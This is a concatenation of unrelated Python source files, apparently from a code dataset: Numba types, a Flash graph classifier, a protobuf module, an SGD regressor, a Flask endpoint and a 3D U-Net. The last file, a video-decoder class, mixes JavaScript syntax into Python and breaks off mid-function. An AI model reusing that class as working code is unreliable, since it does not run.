    """Dispatcher subclass that enters objectmode function.

    Adds no behaviour of its own; the subclass itself serves as the marker.
    """
    pass
class ExternalFunctionPointer(BaseFunction):
    """
    A pointer to a native function (e.g. exported via ctypes or cffi).
    *get_pointer* is a Python function taking an object
    and returning the raw pointer value as an int.
    """
    def __init__(self, sig, get_pointer, cconv=None):
        from numba.core.typing.templates import (AbstractTemplate,
                                                 make_concrete_template,
                                                 signature)
        from numba.core.types import ffi_forced_object
        if sig.return_type == ffi_forced_object:
            raise TypeError("Cannot return a pyobject from a external function")
        self.sig = sig
        # Any ffi_forced_object argument requires holding the GIL at call time.
        self.requires_gil = any(a == ffi_forced_object for a in self.sig.args)
        self.get_pointer = get_pointer
        self.cconv = cconv
        if self.requires_gil:
            class GilRequiringDefn(AbstractTemplate):
                key = self.sig

                def generic(self, args, kws):
                    if kws:
                        raise TypeError("does not support keyword arguments")
                    # Make ffi_forced_object a bottom type to allow any type to be
                    # casted to it. This is the only place that support
                    # ffi_forced_object.
                    coerced = [actual if formal == ffi_forced_object else formal
                               for actual, formal
                               in zip(args, self.key.args)]
                    return signature(self.key.return_type, *coerced)
            template = GilRequiringDefn
        else:
            template = make_concrete_template("CFuncPtr", sig, [sig])
        super(ExternalFunctionPointer, self).__init__(template)

    @property
    def key(self):
        return self.sig, self.cconv, self.get_pointer
class ExternalFunction(Function):
    """
    A named native function (resolvable by LLVM) accepting an explicit signature.
    For internal use only.
    """

    def __init__(self, symbol, sig):
        from numba.core import typing
        self.symbol = symbol
        self.sig = sig
        # One concrete template keyed and named by the LLVM symbol.
        template = typing.make_concrete_template(symbol, symbol, [sig])
        super(ExternalFunction, self).__init__(template)

    @property
    def key(self):
        return self.symbol, self.sig
class NamedTupleClass(Callable, Opaque):
    """
    Type class representing a namedtuple class object (the class itself,
    not its instances).
    """

    def __init__(self, instance_class):
        self.instance_class = instance_class
        super(NamedTupleClass, self).__init__("class(%s)" % (instance_class,))

    @property
    def key(self):
        return self.instance_class

    def get_call_type(self, context, args, kws):
        # Constructor calls are typed by the __call__ resolution in
        # typing.collections, so there is nothing to resolve here.
        return None

    def get_call_signatures(self):
        # No fixed signatures; the constructor is treated as parameterized.
        return (), True
class NumberClass(Callable, DTypeSpec, Opaque):
    """
    Type class for number classes (e.g. "np.float64").
    """

    def __init__(self, instance_type):
        self.instance_type = instance_type
        super(NumberClass, self).__init__("class(%s)" % (instance_type,))

    @property
    def key(self):
        return self.instance_type

    @property
    def dtype(self):
        # DTypeSpec protocol: the dtype is the wrapped instance type itself.
        return self.instance_type

    def get_call_type(self, context, args, kws):
        # Constructor calls are typed by the __call__ resolution in
        # typing.builtins, so there is nothing to resolve here.
        return None

    def get_call_signatures(self):
        # No fixed signatures; the constructor is treated as parameterized.
        return (), True
class RecursiveCall(Opaque):
    """
    Recursive call to a Dispatcher.
    """
    # Class-level default; replaced by a per-instance dict on first __init__.
    _overloads = None

    def __init__(self, dispatcher_type):
        assert isinstance(dispatcher_type, Dispatcher)
        self.dispatcher_type = dispatcher_type
        name = "recursive(%s)" % (dispatcher_type,)
        super(RecursiveCall, self).__init__(name)
        # Initializing for the first time
        if self._overloads is None:
            self._overloads = {}

    @property
    def overloads(self):
        return self._overloads

    @property
    def key(self):
        return self.dispatcher_type
| StarcoderdataPython |
4837953 | <filename>flash/graph/classification/model.py
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
import torch
from torch import nn
from torch.nn import functional as F
from torch.nn import Linear
from flash.core.classification import ClassificationTask
from flash.core.data.io.input import DataKeys
from flash.core.registry import FlashRegistry
from flash.core.utilities.imports import _GRAPH_AVAILABLE
from flash.core.utilities.types import LOSS_FN_TYPE, LR_SCHEDULER_TYPE, METRICS_TYPE, OPTIMIZER_TYPE
from flash.graph.backbones import GRAPH_BACKBONES
from flash.graph.collate import _pyg_collate
if _GRAPH_AVAILABLE:
    from torch_geometric.nn import global_add_pool, global_max_pool, global_mean_pool

    # Named global-pooling strategies selectable via GraphClassifier's
    # ``pooling_fn`` argument.
    POOLING_FUNCTIONS = {"mean": global_mean_pool, "add": global_add_pool, "max": global_max_pool}
else:
    # torch_geometric is not installed; no named pooling functions available.
    POOLING_FUNCTIONS = {}
class GraphClassifier(ClassificationTask):
    """The ``GraphClassifier`` is a :class:`~flash.Task` for classifying graphs. For more details, see
    :ref:`graph_classification`.

    Args:
        num_features (int): The number of features in the input.
        num_classes (int): Number of classes to classify.
        labels: Class labels; when given and ``num_classes`` is None, the class count is inferred.
        backbone: Name of the backbone to use, or a ``(module, out_features)`` tuple.
        backbone_kwargs: Dictionary dependent on the backbone, containing for example in_channels, out_channels,
            hidden_channels or depth (number of layers).
        pooling_fn: The global pooling operation to use (one of: "mean", "max", "add" or a callable).
        head: The head to use.
        loss_fn: Loss function for training, defaults to cross entropy.
        learning_rate: Learning rate to use for training.
        optimizer: Optimizer to use for training.
        lr_scheduler: The LR scheduler to use during training.
        metrics: Metrics to compute for training and evaluation.
    """

    backbones: FlashRegistry = GRAPH_BACKBONES

    required_extras: str = "graph"

    def __init__(
        self,
        num_features: int,
        num_classes: Optional[int] = None,
        labels: Optional[List[str]] = None,
        backbone: Union[str, Tuple[nn.Module, int]] = "GCN",
        backbone_kwargs: Optional[Dict] = None,
        pooling_fn: Optional[Union[str, Callable]] = "mean",
        head: Optional[Union[Callable, nn.Module]] = None,
        loss_fn: LOSS_FN_TYPE = F.cross_entropy,
        learning_rate: Optional[float] = None,
        optimizer: OPTIMIZER_TYPE = "Adam",
        lr_scheduler: LR_SCHEDULER_TYPE = None,
        metrics: METRICS_TYPE = None,
    ):
        if labels is not None and num_classes is None:
            num_classes = len(labels)

        super().__init__(
            loss_fn=loss_fn,
            optimizer=optimizer,
            lr_scheduler=lr_scheduler,
            metrics=metrics,
            learning_rate=learning_rate,
            num_classes=num_classes,
            labels=labels,
        )

        # Save constructor arguments exactly once, after the LightningModule
        # is set up (previously this was also called before super().__init__).
        self.save_hyperparameters()

        # Avoid a shared mutable default argument: treat a missing dict as empty.
        backbone_kwargs = backbone_kwargs or {}

        if isinstance(backbone, tuple):
            self.backbone, num_out_features = backbone
        else:
            self.backbone = self.backbones.get(backbone)(in_channels=num_features, **backbone_kwargs)
            num_out_features = self.backbone.hidden_channels

        self.pooling_fn = POOLING_FUNCTIONS[pooling_fn] if isinstance(pooling_fn, str) else pooling_fn

        if head is not None:
            self.head = head
        else:
            self.head = DefaultGraphHead(num_out_features, num_classes)

        self.collate_fn = _pyg_collate

    def training_step(self, batch: Any, batch_idx: int) -> Any:
        batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])
        return super().training_step(batch, batch_idx)

    def validation_step(self, batch: Any, batch_idx: int) -> Any:
        batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])
        return super().validation_step(batch, batch_idx)

    def test_step(self, batch: Any, batch_idx: int) -> Any:
        batch = (batch[DataKeys.INPUT], batch[DataKeys.TARGET])
        return super().test_step(batch, batch_idx)

    def predict_step(self, batch: Any, batch_idx: int, dataloader_idx: int = 0) -> Any:
        return super().predict_step(batch[DataKeys.INPUT], batch_idx, dataloader_idx=dataloader_idx)

    def forward(self, data) -> torch.Tensor:
        # Node embeddings -> graph-level pooling -> classification head.
        x = self.backbone(data.x, data.edge_index)
        x = self.pooling_fn(x, data.batch)
        return self.head(x)
class DefaultGraphHead(torch.nn.Module):
    """Default classification head: Linear -> ReLU -> Dropout -> Linear.

    Maps graph-level features of size ``hidden_channels`` to
    ``num_classes`` logits.
    """

    def __init__(self, hidden_channels, num_classes, dropout=0.5):
        super().__init__()
        self.lin1 = Linear(hidden_channels, hidden_channels)
        self.lin2 = Linear(hidden_channels, num_classes)
        self.dropout = dropout

    def reset_parameters(self):
        """Re-initialize both linear layers."""
        for layer in (self.lin1, self.lin2):
            layer.reset_parameters()

    def forward(self, x):
        hidden = F.relu(self.lin1(x))
        hidden = F.dropout(hidden, p=self.dropout, training=self.training)
        return self.lin2(hidden)
| StarcoderdataPython |
41451 | <filename>tools/visualize-sawtooth-label.py<gh_stars>0
#!/usr/bin/python3.6
import numpy as np
import csv
import argparse
import matplotlib.pyplot as plt
import sys
import os
####################################
# Sawtooth crash labels visualizer #
####################################
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Sawtooth crash labels visualizer")
    # FIX: the help texts previously described an unrelated tool (a
    # `tgraph.cfg` file and an output directory); corrected to match how the
    # arguments are actually consumed below.
    parser.add_argument("-i", "--sht-file", dest="sht_file", required=True,
                        help="path to the input .sht file with diagnostics signals")
    parser.add_argument("-l", "--labels", dest="labels_file", required=True,
                        help="path to the CSV file with crash labels (signal number, start index, end index)")
    args = parser.parse_args()

    # pyglobus lives in a versioned build-stage directory next to this repo;
    # make it importable before the import below.
    from base import get_globus_version
    current_dir = os.path.dirname(os.path.abspath(__file__))
    sys.path.append(os.path.join(current_dir, "..", "_stage-%s" % get_globus_version(), "python"))
    import pyglobus

    sht_reader = pyglobus.util.ShtReader(args.sht_file)
    with open(args.labels_file, "r") as f:
        reader = csv.reader(f)
        # Skip header
        next(reader)
        for row in reader:
            num_signal = int(row[0])
            start_ind = int(row[1])
            end_ind = int(row[2])
            signal = sht_reader.get_signal(num_signal)
            x = signal.get_data_x()
            y = signal.get_data_y()
            plt.plot(x, y)
            # Red vertical lines mark the labelled crash interval.
            plt.axvline(x[start_ind], color="r")
            plt.axvline(x[end_ind], color="r")
            plt.show()
| StarcoderdataPython |
139563 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: persistent_volume_claim.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
# Default symbol database; the generated descriptor and message class below
# are registered into it so protobuf reflection can find them.
_sym_db = _symbol_database.Default()

# protoc-generated FileDescriptor for persistent_volume_claim.proto
# (package `container`); serialized_pb is the compiled .proto blob.
# NOTE(review): this module is machine generated -- regenerate from the
# .proto file instead of editing the descriptor by hand.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='persistent_volume_claim.proto',
  package='container',
  syntax='proto3',
  serialized_options=_b('ZCgo.easyops.local/contracts/protorepo-models/easyops/model/container'),
  serialized_pb=_b('\n\x1dpersistent_volume_claim.proto\x12\tcontainer\"\x84\x02\n\x15PersistentVolumeClaim\x12\x12\n\ninstanceId\x18\x01 \x01(\t\x12\x0c\n\x04kind\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x14\n\x0cresourceName\x18\x04 \x01(\t\x12\x14\n\x0cresourceSpec\x18\x05 \x01(\t\x12\x0f\n\x07storage\x18\x06 \x01(\t\x12\x13\n\x0b\x61\x63\x63\x65ssModes\x18\x07 \x03(\t\x12\x11\n\tnamespace\x18\x08 \x01(\t\x12\x14\n\x0cstorageClass\x18\t \x01(\t\x12\x16\n\x0estorageClassId\x18\n \x01(\t\x12\x19\n\x11\x63reationTimestamp\x18\x0b \x01(\t\x12\r\n\x05phase\x18\x0c \x01(\tBEZCgo.easyops.local/contracts/protorepo-models/easyops/model/containerb\x06proto3')
)

# Message descriptor: 12 string fields; `accessModes` (label=3) is repeated,
# all others are optional singular strings.
_PERSISTENTVOLUMECLAIM = _descriptor.Descriptor(
  name='PersistentVolumeClaim',
  full_name='container.PersistentVolumeClaim',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='instanceId', full_name='container.PersistentVolumeClaim.instanceId', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='kind', full_name='container.PersistentVolumeClaim.kind', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='name', full_name='container.PersistentVolumeClaim.name', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='resourceName', full_name='container.PersistentVolumeClaim.resourceName', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='resourceSpec', full_name='container.PersistentVolumeClaim.resourceSpec', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='storage', full_name='container.PersistentVolumeClaim.storage', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='accessModes', full_name='container.PersistentVolumeClaim.accessModes', index=6,
      number=7, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='namespace', full_name='container.PersistentVolumeClaim.namespace', index=7,
      number=8, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='storageClass', full_name='container.PersistentVolumeClaim.storageClass', index=8,
      number=9, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='storageClassId', full_name='container.PersistentVolumeClaim.storageClassId', index=9,
      number=10, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='creationTimestamp', full_name='container.PersistentVolumeClaim.creationTimestamp', index=10,
      number=11, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='phase', full_name='container.PersistentVolumeClaim.phase', index=11,
      number=12, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=45,
  serialized_end=305,
)

DESCRIPTOR.message_types_by_name['PersistentVolumeClaim'] = _PERSISTENTVOLUMECLAIM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

# Concrete message class, produced from the descriptor by the reflection metaclass.
PersistentVolumeClaim = _reflection.GeneratedProtocolMessageType('PersistentVolumeClaim', (_message.Message,), {
  'DESCRIPTOR' : _PERSISTENTVOLUMECLAIM,
  '__module__' : 'persistent_volume_claim_pb2'
  # @@protoc_insertion_point(class_scope:container.PersistentVolumeClaim)
  })
_sym_db.RegisterMessage(PersistentVolumeClaim)

DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| StarcoderdataPython |
82878 | from types import CodeType as Code
def construct():
    """Stub construction hook; intentionally a no-op for now (returns None)."""
def create() -> "Object":
    """Stub factory for an ``Object``; not implemented yet (returns None).

    BUG FIX: the annotation was the bare name ``Object``, which is never
    imported, so evaluating the annotation raised ``NameError`` the moment
    the module was imported. Quoting it turns it into a lazily-evaluated
    forward reference while keeping the declared return type.
    """
    ...
def define() -> Code:
    """Stub factory for a code object; intentionally a no-op for now (returns None)."""
| StarcoderdataPython |
135007 | <filename>modules/check_result.mako.py
# -*- coding:utf-8 -*-
from mako import runtime, filters, cache
# Module-level bookkeeping emitted by the Mako template compiler for
# 'htdocs/check_result.mako'.
# NOTE(review): regenerate from the template instead of editing by hand --
# the __M_BEGIN_METADATA footer maps generated lines back to template lines.
UNDEFINED = runtime.UNDEFINED
STOP_RENDERING = runtime.STOP_RENDERING
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1510155020.292707
_enable_loop = True
_template_filename = 'htdocs/check_result.mako'
_template_uri = 'check_result.mako'
_source_encoding = 'utf-8'
_exports = []
def render_body(context,**pageargs):
    """Render the template body (generated by Mako); returns ''.

    Writes the HTML page which, on document-ready, calls
    ``window.parent.verifyData(<cmp>)`` with the template's ``cmp`` value.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        cmp = context.get('cmp', UNDEFINED)
        __M_writer = context.writer()
        __M_writer('<!DOCTYPE html>\n<html>\n<head>\n\n    <script src="/static/jquery.min.1.9.1.js"></script>\n    <title></title>\n</head>\n    <script language="JavaScript">\n        var $j = jQuery.noConflict();\n\n        function exists() {\n            return true;\n        }\n        $j(document).ready(function() {\n            window.parent.verifyData(\'')
        __M_writer(str(cmp))
        __M_writer("');\n        });\n    </script>\n<body>\n</body>\n</html>")
        return ''
    finally:
        context.caller_stack._pop_frame()
"""
__M_BEGIN_METADATA
{"filename": "htdocs/check_result.mako", "source_encoding": "utf-8", "uri": "check_result.mako", "line_map": {"16": 0, "24": 15, "30": 24, "22": 1, "23": 15}}
__M_END_METADATA
"""
| StarcoderdataPython |
1621968 | <reponame>ace-gabriel/chrome-extension<filename>application/main/clients/city.py
# -*- encoding='utf-8'
import pandas as pd
import numpy as np
from flask import request, jsonify, g
from flask import Blueprint
from ...utils.esquery import EsqueryHelper
from ...utils.query import QueryHelper
from ...utils.auth import requires_auth, json_validate, requires_rule
from ...utils.helper import uuid_gen
from ...utils.query_census import query_census_detail
from ...utils.request import get_ipaddr
from ...settings import HOME_INDEX,HOME_TYPE
from ...finance.search_city import *
from index import app,db,es,redis_store,limiter,home_cache,city_cache
from ...models import IpQuery
import datetime
import json
# Blueprint for the client-facing city dashboard endpoints; `logger` reuses
# the application's configured logger.
city_bp = Blueprint('client_city', __name__)
logger = app.logger
def rate_limit_from_g():
    """Look up the per-request rate limit previously stashed on ``flask.g``
    (presumably by the ``@requires_rule`` decorator — confirm)."""
    current_limit = g.limit
    return current_limit
@city_bp.route('/dashboard/search', methods=['POST'])
@requires_rule
@limiter.limit(rate_limit_from_g)
@uuid_gen
def get_city_data():
    """POST /dashboard/search: return dashboard stats for a (city, state).

    Results are cached per city geoid: on a cache hit the stored JSON is
    returned directly; otherwise neighborhood, real-estate and census stats
    are computed, merged, cached (effectively permanently) and returned.
    """
    rule = g.current_rule  # set upstream by @requires_rule; kept as-is — confirm whether it is still needed
    incoming = request.get_json()
    city = incoming.get('city')
    state = incoming.get('state')
    engine_str = app.config['SQLALCHEMY_BINDS']['datawarehouse']
    city_geoid = map_geoid(engine_str, city, state)
    # FIX (PEP 8 / E711): identity comparison with None, was `== None`.
    # NOTE(review): returning None from a Flask view produces a 500; a proper
    # 404 JSON response would be friendlier — left unchanged to preserve the
    # current API contract.
    if city_geoid is None:
        return None
    cached_result = city_cache[city_geoid]
    if cached_result:
        return jsonify(**json.loads(cached_result))
    nb_stats = scoring_neighborhood(city)
    real_estate_stats = get_city_sources(city)
    census_result = query_census_detail(engine_str, city_geoid)
    # Python-2-only dict merge (dict.items() returns lists there); later
    # sources win on key clashes.
    result = dict(nb_stats.items() + real_estate_stats.items() + census_result.items())
    # Cache the merged stats; expiration is ~99 years, i.e. effectively permanent.
    city_cache.set_key_value(name=city_geoid, value=json.dumps(result), expiration=60 * 60 * 24 * 365 * 99)
    return jsonify(result)
| StarcoderdataPython |
13565 | from .linear_torch import TorchGradientDescentAutogradRegression
import torch, math, random
class stochasticGradientDescent(TorchGradientDescentAutogradRegression):
    """Mini-batch stochastic gradient descent on top of the autograd base class.

    Keyword arguments:
        batch_size: samples per mini-batch (default 1, i.e. classic SGD).
        epochs_no:  number of full passes over the data (default 1).
    """

    def __init__(self, X, Y, alpha, **kwargs):
        super(stochasticGradientDescent, self).__init__(X, Y, alpha, **kwargs)
        try:
            h = kwargs['batch_size']
            # Floor division so iterations * batch_size == sample count
            # (any remainder samples are dropped, as before).
            self.iterations = int(self.Y.shape[0]) // h
            self.batch_size = int(self.Y.shape[0]) // self.iterations
        except KeyError:  # was a bare `except:`; only a missing kwarg is expected here
            self.iterations = int(self.Y.shape[0])
            self.batch_size = 1
        try:
            self.epochs_no = kwargs['epochs_no']
        except KeyError:
            self.epochs_no = 1
        self.batches = None

    def assign_batchs(self):
        """Shuffle the sample indices and split them into disjoint mini-batches."""
        indices = list(range(int(self.Y.shape[0])))
        random.shuffle(indices)
        batches = list()
        # BUG FIX: the slices used to be indices[i:i+batch_size] for
        # i = 0..iterations-1, which yields overlapping windows over only the
        # first samples whenever batch_size > 1; stepping by batch_size makes
        # the batches tile the whole (shuffled) data set.
        for i in xrange(self.iterations):
            batches.append(indices[i * self.batch_size:(i + 1) * self.batch_size])
        self.batches = batches
        return batches

    def ForwardFunction(self, i):
        """Mean-squared-error loss of the linear model on mini-batch ``i``."""
        X = self.X[self.batches[i]]
        Y = self.Y[self.batches[i]]
        p = torch.mean((Y - X.mm(self.theta.double())) ** 2)  # loss forward pass
        self.objective = p
        return p

    def get_grads(self, i):
        """Backpropagate the batch loss and return d(loss)/d(theta)."""
        self.initialise_theta()
        k = self.ForwardFunction(i)
        self.objective.backward()
        self.gradients = self.theta.grad
        return self.gradients

    def epoch(self):
        """One full pass: a gradient step per mini-batch; returns the final theta."""
        for i in xrange(self.iterations):
            self.update_theta(i)
        return self.theta

    def update_theta(self, i):
        """Gradient step on mini-batch ``i`` (clone avoids in-place autograd updates)."""
        h = self.get_grads(i)
        current_theta = self.theta.clone()
        current_theta -= self.gradients * self.alpha
        self.theta = current_theta
        return current_theta

    def train(self):
        """Run ``epochs_no`` epochs of mini-batch SGD and return the final theta.

        BUG FIX: ``return theta`` used to sit *inside* the epoch loop, so
        only one epoch ever ran regardless of ``epochs_no``; the return now
        follows the loop. Unreachable leftovers after the old return (an MSE
        print and an early-stop stub on ``error``) have been removed.
        """
        self.initialise_theta()
        for i in xrange(self.epochs_no):
            self.assign_batchs()
            print('')
            theta = self.epoch().double()
            print('Epoch - ' + str(i + 1))
            print('')
        return theta
1661275 | <filename>threeDCNN.py
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNNLayer(nn.Module):
    """Two stacked (Conv3d 3x3x3, pad 1 -> BatchNorm3d -> ReLU) blocks.

    Spatial dimensions are preserved; channels go C_in -> C_out -> C_out.
    """

    def __init__(self, C_in, C_out):
        super(CNNLayer, self).__init__()
        self.layer = nn.Sequential(
            nn.Conv3d(C_in, C_out, 3, 1, 1),
            nn.BatchNorm3d(C_out),
            nn.ReLU(),
            nn.Conv3d(C_out, C_out, 3, 1, 1),
            nn.BatchNorm3d(C_out),
            nn.ReLU(),
        )

    def forward(self, x):
        return self.layer(x)
class Downsample(nn.Module):
    """Spatial downsampling by 3D max-pooling with the given kernel size (stride = kernel)."""

    def __init__(self, kernel_size):
        super(Downsample, self).__init__()
        self.layer = nn.MaxPool3d(kernel_size)

    def forward(self, x):
        return self.layer(x)
class Upsample(nn.Module):
    """Double the spatial resolution (trilinear interpolation), then halve the
    channel count with a 1x1x1 convolution."""

    def __init__(self, C):
        super(Upsample, self).__init__()
        self.C = nn.Conv3d(C, C // 2, 1, 1)

    def forward(self, x):
        doubled = F.interpolate(x, scale_factor=2, mode='trilinear')
        return self.C(doubled)
class ThreeDCNN(nn.Module):
    """3D U-Net: a 4-level encoder/decoder with skip connections.

    Input (N, 1, D, H, W) -> output (N, 3, D, H, W) logits; D/H/W must be
    divisible by 16 so the decoder's upsampled maps align with the encoder
    skips for concatenation.
    """

    def __init__(self):
        super(ThreeDCNN, self).__init__()
        # Encoder: channels double at each level while resolution halves.
        self.Conv1 = CNNLayer(1, 32)
        self.Downsample1 = Downsample(2)
        self.Conv2 = CNNLayer(32, 64)
        self.Downsample2 = Downsample(2)
        self.Conv3 = CNNLayer(64, 128)
        self.Downsample3 = Downsample(2)
        self.Conv4 = CNNLayer(128, 256)
        self.Downsample4 = Downsample(2)
        # Bottleneck.
        self.Conv5 = CNNLayer(256, 512)
        # Decoder: upsample, concatenate the matching encoder output, convolve.
        self.Upsample1 = Upsample(512)
        self.Conv6 = CNNLayer(512, 256)
        self.Upsample2 = Upsample(256)
        self.Conv7 = CNNLayer(256, 128)
        self.Upsample3 = Upsample(128)
        self.Conv8 = CNNLayer(128, 64)
        self.Upsample4 = Upsample(64)
        self.Conv9 = CNNLayer(64, 32)
        self.final = torch.nn.Conv3d(32, 3, 3, 1, 1)

    def forward(self, x):
        # Encoder path, keeping each level's output for the skip connections.
        skip1 = self.Conv1(x)
        skip2 = self.Conv2(self.Downsample1(skip1))
        skip3 = self.Conv3(self.Downsample2(skip2))
        skip4 = self.Conv4(self.Downsample3(skip3))
        bottom = self.Conv5(self.Downsample4(skip4))
        # Decoder path: upsample + skip concatenation (channel dim) + conv.
        up = self.Conv6(torch.cat([self.Upsample1(bottom), skip4], dim=1))
        up = self.Conv7(torch.cat([self.Upsample2(up), skip3], dim=1))
        up = self.Conv8(torch.cat([self.Upsample3(up), skip2], dim=1))
        up = self.Conv9(torch.cat([self.Upsample4(up), skip1], dim=1))
        return self.final(up)
3269301 | from pillcase.pillcase import Pillcase
class VC(object):
    # NOTE(review): this class appears to be a line-by-line port of a
    # browser JavaScript composite-video (luma/chroma over stereo audio)
    # decoder that was never finished. It still contains JS syntax
    # (`=>` lambdas, `new`, `++`, `||`, `//` comments, `foreach`,
    # brace-delimited object literals, single-line `if (...) stmt`) and
    # DOES NOT parse as Python. Left byte-identical: it needs a real port
    # (canvas/audio APIs have no direct Python equivalents), not a touch-up.
    def __init__(self):
        self.config = {
            "buffersize": 512,
            "clearInterval": 50,
            "overScan": 0.82,
            "hOffset": 0.06525,
            "pulseLength": (0.2 / 1000),
            "lineWidth": 2.5,
            "brightness": 1,
            "saturation": 1,
            "blend": True,
            "hFreq": 225.0,
            "vFreq": 3
        }
        self.buffersize = self.config["buffersize"]
        self.sig = {
            "LMin": 0.0,
            "LMax": 1.0,
            "CMin": -1.0,
            "CMax": 1.0,
        }
        self.hPhase = 0
        self.vPhase = 0
        self.pulse = {
            "time": 0,
            "timeout": 0,
            "luma": 0,
            "lumaPrev": 0,
            "chroma": 0,
            "chromaPrev": 0,
            "changed": False,
            "ready": False
        }
        self.timing = {
            "time": 0,
            "lastV": 0,
            "lastH": 0,
        }
        self.field = 0
        self.chromaField = 0
        self.chromaDelay = []
        self.chromaDelayIndex = 0
        self.lines = []
        self.currLine = {
            "x1": 0,
            "y": 0,
            "maxPhase": 0,
            "colors": []
        }
        self.lastClear = 0
        self.clearInterval = self.config["clearInterval"]
        self.overScan = self.config["overScan"]
        self.hOffset = self.config["hOffset"]
        self.pulseLength = self.config["pulseLength"]
        self.canvas = config.canvas
        self.ctx = self.canvas.getContext("2d")
        self.width = self.canvas.width
        self.height = self.canvas.height
        self.lineWidth = self.config["lineWidth"]
        self.blend = self.config["blend"]
        self.brightness = self.config["brightness"]
        self.saturation = self.config["saturation"]
        requestAnimationFrame(() => self.draw())
        self.audioCtx = new window.AudioContext()
        self.sampleRate = self.audioCtx.sampleRate
        self.audioInput = None
        self.decoder = None
        self.hFreqTarget = 1.0 / self.config["hFreq"] * self.sampleRate
        self.vFreqTarget = 1.0 / self.config["vFreq"] * self.sampleRate
        self.hFreq = self.hFreqTarget
        self.vFreq = self.vFreqTarget
        navigator.mediaDevices.getUserMedia(
            {
                audio: {
                    echoCancellation: False,
                    noiseSuppression: False,
                    autoGainControl: False,
                    channelCount: 2
                }
            })
            .then(stream =>
            {
                self.audioInput = self.audioCtx.createMediaStreamSource(stream)
                self.decoder = self.audioCtx.createScriptProcessor(self.buffersize, 2, 2)
                self.decoder.onaudioprocess = event => self.process(event)
                self.audioInput.connect(self.decoder)
                self.decoder.connect(self.audioCtx.destination) // Needed to work around webkit bug
            })
            .catch(console.error)
    def hPhaseToX(hPhase, vPhase, field):
        return ((hPhase - self.hOffset) / self.overScan) * self.width
    def vPhaseToY(hPhase, vPhase, field):
        return (vPhase + (field / self.vFreq) * self.hFreq * 0.5) * self.height
    def YCbCrToRGB(y, cb, cr):
